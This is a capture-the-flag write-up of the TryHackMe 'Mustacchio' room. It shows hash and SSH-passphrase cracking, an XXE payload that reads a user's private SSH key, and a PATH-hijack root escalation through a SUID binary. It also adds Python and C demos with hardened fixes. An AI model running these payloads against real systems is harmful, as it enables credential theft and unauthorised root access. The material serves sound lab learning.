Challenge Link: https://tryhackme.com/room/mustacchio
I started enumeration with a full TCP port scan in nmap to find open ports and the services running on them, using the command shown below. rustscan gives faster results for the initial port sweep; nmap is still needed afterwards for the service and script scan.
❯ nmap -sC -sV -Pn -p- -T4 --max-rate=1000 10.10.192.38 -oN nmap.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-12 13:10 IST
Stats: 0:02:42 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 60.95% done; ETC: 13:15 (0:01:44 remaining)
Nmap scan report for 10.10.192.38
Host is up (0.19s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d3:9e:50:66:5f:27:a0:60:a7:e8:8b:cb:a9:2a:f0:19 (RSA)
|   256 5f:98:f4:5d:dc:a1:ee:01:3e:91:65:0a:80:52:de:ef (ECDSA)
|_  256 5e:17:6e:cd:44:35:a8:0b:46:18:cb:00:8d:49:b3:f6 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
8765/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Three ports are open: SSH on 22, an Apache web server on 80 and an nginx web server on 8765. First let's enumerate the Apache server on port 80.
While going through the website I found two hashes, one in /custom/js/mobile.js and the second in
Next, I cracked these hashes with hashcat and found that both are hashes of the text "bull*****".
Directory brute forcing didn't reveal any interesting pages, so I moved on to the nginx server on port 8765 and found a login page.
I was able to log in with the credentials admin:bull***** (the cracked hash reused as the admin password), and after logging in I found a comment functionality.
Posting the text "hello" didn't reflect anything. I thought it might be XSS, but a standard XSS payload didn't work either. After checking the source code of home.php, I found something interesting.
The source code clearly shows that this could be an XXE vulnerability. The source also contains the comment "Barry, you can now SSH in using your key!", which confirms that the goal of the XXE is to read barry's SSH private key. I also found an interesting file referenced in the source code
This is XML, so I tried adding a comment in the same format:
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>hello.</com>
</comment>
This time the comment was accepted and reflected. Now it's time to exploit the XXE to read internal files such as barry's SSH key, by declaring an external entity and referencing it from the <com> element with the following payload:
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa" >
]>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>&xxe;</com>
</comment>
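To make the mechanism concrete, here is an added example (not code from the room, and not the target's home.php, which was never available) that builds the same comment payload for any file, shows why a parser that honours external entities hands back the file's contents, and shows the parser-side fix. The "vulnerable" parser is a stand-in built on Python's bundled expat with an external-entity handler installed; it assumes a POSIX filesystem with absolute paths and only models file:// URLs.

```python
"""XXE demo for the comment form above: payload builder, a stand-in for the
vulnerable parser, and the hardened parser. Added example, not room code."""
import os
import tempfile
import xml.parsers.expat
from urllib.parse import urlparse


def build_xxe_payload(path, name="Joe Hamd", author="Barry Clad"):
    """Same element structure as the comment XML found on the page, with
    <com> replaced by an external entity pointing at an absolute file path."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE comment [\n"
        f'  <!ENTITY xxe SYSTEM "file://{path}">\n'
        "]>\n"
        "<comment>\n"
        f"  <name>{name}</name>\n"
        f"  <author>{author}</author>\n"
        "  <com>&xxe;</com>\n"
        "</comment>\n"
    )


def _collecting_parser(fields, stack):
    """expat parser that records the text content of every element."""
    parser = xml.parsers.expat.ParserCreate()

    def start(tag, attrs):
        stack.append(tag)
        fields.setdefault(tag, "")

    def end(tag):
        stack.pop()

    def chars(data):
        if stack:
            fields[stack[-1]] += data

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    return parser


def parse_comment_vulnerable(xml_text):
    """Stand-in for the vulnerable server: external entities are fetched and
    spliced into the document, so &xxe; expands to the file's contents."""
    fields, stack = {}, []
    parser = _collecting_parser(fields, stack)

    def fetch_external(context, base, system_id, public_id):
        url = urlparse(system_id)
        if url.scheme != "file":      # only file:// is modelled here (assumption)
            return 1
        with open(url.path, "rb") as fh:
            data = fh.read()
        # The child parser inherits the handlers, so the file's text lands in
        # whichever element referenced the entity (here <com>).
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(data, True)
        return 1

    parser.ExternalEntityRefHandler = fetch_external
    parser.Parse(xml_text, True)
    return {k: v for k, v in fields.items() if k != "comment"}


def parse_comment_hardened(xml_text):
    """Fix: reject any DOCTYPE (hence any entity declaration) and never
    install an external entity handler. Raises ValueError on a DOCTYPE."""
    fields, stack = {}, []
    parser = _collecting_parser(fields, stack)

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError("DOCTYPE is not allowed in comment submissions")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.Parse(xml_text, True)
    return {k: v for k, v in fields.items() if k != "comment"}


def demo():
    """Run both parsers against a constructed stand-in for id_rsa. Returns
    (text leaked by the vulnerable parser, whether the hardened one refused)."""
    fake_key = ("-----BEGIN RSA PRIVATE KEY-----\n"
                "CONSTRUCTED-NOT-A-REAL-KEY\n"
                "-----END RSA PRIVATE KEY-----\n")
    with tempfile.NamedTemporaryFile("w", suffix=".id_rsa", delete=False) as fh:
        fh.write(fake_key)
        path = fh.name                 # absolute path on POSIX, as assumed
    try:
        payload = build_xxe_payload(path)
        leaked = parse_comment_vulnerable(payload)["com"]
        try:
            parse_comment_hardened(payload)
            refused = False
        except ValueError:
            refused = True
    finally:
        os.remove(path)
    return leaked, refused


if __name__ == "__main__":
    leaked_text, was_refused = demo()
    print(leaked_text)
    print("hardened parser refused the payload:", was_refused)
```

One caveat worth knowing before pointing this at other files: the entity body is parsed as XML text, so a file containing a bare `<` or `&` breaks the parse and nothing comes back. A private key or /etc/passwd is fine; for arbitrary files on a PHP target the usual workaround is a `php://filter/convert.base64-encode/resource=` wrapper in the SYSTEM identifier, which is general XXE practice rather than something this page shows.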
Now we have barry's id_rsa, which can be used to SSH into the machine as barry, but first we need to crack its passphrase. ssh2john converts the key into a hash john can work on, and rockyou cracks it in seconds:
❯ python /usr/share/john/ssh2john.py id_rsa > hash
❯ ../../jumbo/run/john --wordlist=../../rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
uri*****         (id_rsa)
1g 0:00:00:02 DONE (2021-06-12 14:17) 0.4048g/s 1202Kp/s 1202Kc/s 1202KC/s urieljr.k..urielfabricio07
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Cost 1 being 0 means the key is in the legacy PEM format (AES key derived with MD5, a single iteration), which is why john gets through over a million candidates per second here; a key in the newer OpenSSH format with the bcrypt KDF would be far slower to crack.
Now, using this passphrase and id_rsa, we can SSH into the machine as barry:
ssh barry@10.10.255.10 -i id_rsa
The authenticity of host '10.10.255.10 (10.10.255.10)' can't be established.
ECDSA key fingerprint is SHA256:g//RSEsVCZF6FIydF0R24Gmek8fI6D7kRnDXF3fNK9Y.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.255.10' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
. . .
barry@mustacchio:~$ id
uid=1003(barry) gid=1003(barry) groups=1003(barry),4(adm)
For privilege escalation I started by looking for SUID binaries with the command shown below:
barry@mustacchio:~$ find / -perm -u=s -type f 2>/dev/null
. . .
/usr/bin/sudo
/usr/bin/newuidmap
/usr/bin/gpasswd
/home/joe/live_log
/home/joe/live_log stands out because it is not a standard system binary. Running strings on it shows that it imports setuid, setgid and system, and that it runs the tail command to read /var/log/nginx/access.log:
barry@mustacchio:~$ strings /home/joe/live_log
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
printf
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
A\A]A^A_
Live Nginx Log Reader
tail -f /var/log/nginx/access.log
If we look carefully, tail is not called by its absolute path, so the shell that system() spawns resolves it through the caller's $PATH. We can take advantage of this by prepending a directory we control to $PATH and creating our own executable named tail in it:
barry@mustacchio:/tmp$ nano tail
barry@mustacchio:/tmp$ cat tail
#!/bin/sh
bash
barry@mustacchio:/tmp$ chmod 777 tail
barry@mustacchio:/tmp$ export PATH=/tmp:$PATH
barry@mustacchio:/tmp$ /home/joe/live_log
root@mustacchio:/tmp# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1003(barry)
Because the binary calls setuid and setgid before system(), the shell it spawns gets a real uid of 0 rather than only an effective one, which is why a plain bash (no -p) lands us directly in a root shell. chmod 777 is more than needed here; chmod +x on the fake tail would be enough.
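As an added example (not the source of live_log, which we only saw through strings), the following C reconstructs the pattern those strings suggest, shows the hardened version of the same launcher, and reproduces the $PATH lookup that decides which tail runs. The vulnerable and hardened launchers are not exercised by the demo, since they need a setuid-root context; the lookup is run against two constructed temporary directories, and /usr/bin/tail is assumed as the real binary's location.

```c
/* SUID + system("tail ...") demonstration. Added example, not the live_log
 * source: a reconstruction of the pattern its strings output suggests. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

/* Reproduce the lookup /bin/sh performs for an unqualified command: walk
 * PATH left to right and return the first executable regular file. Empty
 * PATH entries (meaning ".") are skipped in this simplified version. */
int which_in_path(const char *cmd, const char *path, char *out, size_t outlen)
{
    char *copy = strdup(path);
    if (copy == NULL)
        return 0;
    int found = 0;
    char *save = NULL;
    for (char *dir = strtok_r(copy, ":", &save); dir != NULL; dir = strtok_r(NULL, ":", &save)) {
        char candidate[4096];
        struct stat st;
        snprintf(candidate, sizeof candidate, "%s/%s", dir, cmd);
        if (stat(candidate, &st) == 0 && S_ISREG(st.st_mode) && access(candidate, X_OK) == 0) {
            snprintf(out, outlen, "%s", candidate);
            found = 1;
            break;
        }
    }
    free(copy);
    return found;
}

/* The vulnerable pattern: raise privilege, then hand a relative command name
 * to /bin/sh, which resolves "tail" through the caller's PATH. */
int run_log_reader_vulnerable(void)
{
    if (setuid(0) != 0 || setgid(0) != 0)
        return 1;
    return system("tail -f /var/log/nginx/access.log");
}

/* Hardened launcher: absolute path (assumed /usr/bin/tail), no shell, and a
 * fixed environment so the caller's PATH and loader variables never reach
 * the child. Returns only if execve itself fails. */
int run_log_reader_hardened(void)
{
    char *const argv[] = {"tail", "-f", "/var/log/nginx/access.log", NULL};
    char *const envp[] = {"PATH=/usr/bin:/bin", NULL};
    if (setgid(0) != 0 || setuid(0) != 0)
        return 1;
    execve("/usr/bin/tail", argv, envp);
    perror("execve");
    return 1;
}

/* Constructed scenario: an executable named tail in a temp directory. */
static int make_fake_tail(const char *dir)
{
    char p[4096];
    snprintf(p, sizeof p, "%s/tail", dir);
    FILE *f = fopen(p, "w");
    if (f == NULL)
        return 0;
    fputs("#!/bin/sh\nbash\n", f);
    fclose(f);
    return chmod(p, 0755) == 0;
}

static void remove_fake_tail(const char *dir)
{
    char p[4096];
    snprintf(p, sizeof p, "%s/tail", dir);
    unlink(p);
    rmdir(dir);
}

/* Returns 1 when the directory listed first in PATH wins in both orders. */
int demo_hijack(void)
{
    char attacker[] = "/tmp/livelog-attacker-XXXXXX";   /* stands in for /tmp */
    char legit[] = "/tmp/livelog-legit-XXXXXX";         /* stands in for /usr/bin */
    if (mkdtemp(attacker) == NULL || mkdtemp(legit) == NULL)
        return 0;
    int ok = make_fake_tail(attacker) && make_fake_tail(legit);
    char path[8192], found[4096], expect[4096];

    /* export PATH=/tmp:$PATH -> the attacker's copy is resolved first */
    snprintf(path, sizeof path, "%s:%s", attacker, legit);
    snprintf(expect, sizeof expect, "%s/tail", attacker);
    ok = ok && which_in_path("tail", path, found, sizeof found) && strcmp(found, expect) == 0;

    /* with a sane PATH the legitimate copy wins */
    snprintf(path, sizeof path, "%s:%s", legit, attacker);
    snprintf(expect, sizeof expect, "%s/tail", legit);
    ok = ok && which_in_path("tail", path, found, sizeof found) && strcmp(found, expect) == 0;

    remove_fake_tail(attacker);
    remove_fake_tail(legit);
    return ok;
}

int main(void)
{
    printf("PATH hijack demo: %s\n", demo_hijack() ? "first directory in PATH wins" : "demo failed");
    return 0;
}
```

The fix is not only the absolute path: passing a fixed envp to execve also discards the caller's environment, and calling setgid before setuid avoids the case where a dropped uid can no longer change groups. Checking the return values of setuid and setgid matters too; the reconstruction above ignores them in the vulnerable version only because the strings output gives no hint that the original checked them.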
We are root now and we have completed the challenge successfully!
- Password cracking
- Finding and exploiting XXE
- SUID binary exploitation
Thanks for reading! For any queries you can DM me on discord golith3r00t#1859.
NOTE: The awesome artwork used in this article was created by Nicholas Roberts.